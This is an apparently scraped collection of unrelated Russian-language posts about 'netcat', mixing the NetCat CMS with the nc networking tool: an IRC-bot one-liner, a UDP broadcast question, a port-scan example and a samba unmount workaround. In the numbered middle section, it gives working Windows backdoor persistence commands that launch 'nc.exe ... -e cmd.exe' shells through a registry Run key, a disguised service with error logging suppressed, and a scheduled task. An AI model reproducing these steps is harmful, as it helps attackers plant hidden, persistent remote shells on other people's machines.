to post messages and comments.

Нид хелп! Сайт на netcat, везде прописан utf-8, но одна из страниц упорно открывается в браузере почему-то в 1251 и соответственно кракозябрами. Куда копать? На базе, в htaccess и проч. установлен utf...

У 1С-БИТРИКС строгое требование, чтобы настройка php mbstring.func_overload была выставлена в 2. В инсталяшке NetCat 5.0 обналружил проверку на строгое соответствие 0. Это у них подпольная война да? А мой мозг?

Почему `nc -l 8000` не открывает порт 8000? То есть с огромным удовольствием запускается, ни на что не ругается, а вот порт на самом-то деле не слушает. Или только внутри localhost'а? Для меня это совершенно новый инструмент, так что и вопросы глупые.

NetCat напоминает, прости Господи, 1С. Не люблю я такую заботу о пользователе, когда почти всё делается мышекликаньем по кучу форм, но код всё равно руками писать приходится. Да ещё в неудобном редакторе.

Кто-нибудь пробовал слать данные с помощью netcat на широковещательный адрес по UDP? GNU-версия netcat'а выкидывает какую-то ошибку, а openbsd-версия завершается типа всё нормально, хотя данные не передаёт. ЧЯДНТ?

Общая идея работы с плейнтекстовым протоколом на шелле, умеет коннектится и отвечать на пинги:

touch socket; tail -f socket | nc irc.freenode.org 6667 | ( echo "NICK lolbotshort" >> socket; echo "USER aa bb cc dd" >> socket; cat — | while read line; do echo "$line"; echo "$line" | grep -qi "^PING" && { echo "$line" | sed 's/^PING/PONG/' >> socket; }; done; ); rm -f socket

Готовый скелет: paste2.org

Сканирование портов:
nc –z –n –v –w 1 192.168.1.100 1-1024

nc –n –v –w 1 –z 192.168.1.100 20 21 22 25 80 8080

В обоих примерах используются следующие флаги:
-z (zero-input/output mode) (работа без программных задержек);
-n (numeric-only, используем, так как задается IP-адрес, а не домен);
-w (таймаут на коннекты в секундах).


1. Бекдоринг netcat’ом – путем добавления соответствующего ключа в ветку реестра для автозапуска:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d “c:\windows\nc.exe –d 192.168.1.70 1234 –e cmd.exe”

При последующем логине в систему произойдет запуск netcat с открытием шелла на 1234 порту. Нюанс тут в том, что бекдор исполнится с правами того пользователя, который залезет на эту машину. Поэтому такие действия вполне могут открыть доступ полноценного администратора домена.

2. Исполнение бекдора в режиме «Windows Service». Вообще, netcat никогда не был заточен под виндовую службу, но, извратившись, мы можем сделать его таковым:

sc create Network Connections Service binPath= “cmd /K start c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore

Командой SC создается сервис с несуществующим именем (чтобы в глаза не бросалось) «Network Connections Service». Флаг start= auto указывает, чтобы сервис запускался сразу после загрузки ОС, а error=ignore – запрещает посылать какие-либо логи в системный журнал. Если все сделано правильно, то тебя обрадует надпись «[SC] CreateService SUCCESS». Соль в том, что даже если операционка будет перезапущена, с ее включением бекдор вновь начнет свою работу.

3. Запуск netcat с использованием Windows Task Sheduler (планировщика задач). Как вариант, можно запустить netcat в определенное время, а именно – когда темно и тихо. В этом нам поможет встроенный в Windows планировщик.

net start schedule

at 12:00:00 /every:m,t,w,th,f,s,su “”c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe””

Каждый день (буквы отвечают за дни недели), в 12:00:00 у нас будет открываться шелл.

Была проблема с долгим отмонтированием самбы (описывал вчера) решил при помощи нетката. На компе, где самба примонтирована, запускается netcat -l -p port -e script (эдакий простениький телнет, который только и умеет, что отмонтировать заветную шару). А на своем компе в инитскрипт самбы дописал в секцию "stop" отсылку неткатом команды на клиентский комп. Теперь демон моей самбы умный, по сути он при завершении отмонтирует самбу. Костыльненько так, зато красиво.
ЗюЫю хотя если бы cifs сам проверял доступность примонтированных шар, и в случае недоступности срал в логи и отмонтировал шары, было б красивее